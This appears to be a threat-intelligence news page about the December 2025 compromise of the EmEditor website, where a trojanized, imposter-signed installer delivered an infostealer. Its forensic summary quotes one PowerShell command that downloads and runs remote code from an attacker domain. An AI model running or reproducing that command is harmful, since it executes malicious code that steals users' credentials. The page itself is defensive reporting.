Attackers compromised the official EmEditor website, a popular text editor, and replaced legitimate installer files with malware-laden versions between December 19 and December 22, 2025. The malicious installer, distributed through the website's main download button, was digitally signed by an imposter entity, "WALSHAM INVESTMENTS LIMITED," rather than the legitimate Emurasoft Inc., deceiving users into trusting the download. The attack exploited the website's redirect mechanism, pointing users to a tampered installer hosted on the WordPress content directory, and targeted a global user base of developers and IT professionals.
Forensic analysis revealed that the installer contained a sophisticated infostealer payload, which used an embedded VBScript to execute a PowerShell command (powershell.exe "irm emeditorjp.com | iex"). This command downloaded and executed additional malicious code directly in memory, allowing the malware to steal sensitive credentials and evade traditional file-based detection. The incident highlights the risks of supply chain attacks and the importance of verifying software authenticity, even from trusted sources.

Trace attribution and downstream blast radius.
4 events from the most recent confirmed update back to the earliest known activity.
Emurasoft advised users to verify installer authenticity, disconnect potentially affected systems, scan for malware, and reset credentials if they downloaded from the compromised homepage. The company also apologized to customers and said it was continuing to investigate the incident.
Analysis by Qianxin's RedDrip Team found the trojanized installer deployed an infostealer via VBScript and PowerShell, stealing credentials, browser and VPN data, and installing a malicious browser extension. The extension supported persistence, remote command capabilities, cryptocurrency theft, and Facebook ad account credential theft.
The website-based supply chain attack stopped on 2025-12-22 after four days of exposing visitors to the poisoned installer. Users who downloaded through the homepage during this window were at risk, while the built-in updater, portable version, and direct download from download.emeditor.info were reportedly unaffected.
Between 2025-12-19 and 2025-12-22, attackers compromised the official EmEditor website's homepage download flow and redirected users to a malicious installer instead of the legitimate package. The fake installer was signed by WALSHAM INVESTMENTS LIMITED rather than Emurasoft, Inc.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
See attribution and downstream blast radius, and whether this package or vendor reaches your builds.
3 references tracked. Mallory keeps watching after this page renders.
cybersecuritynews.com
Open sourcehackread.com
Open sourcesecurityonline.info
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.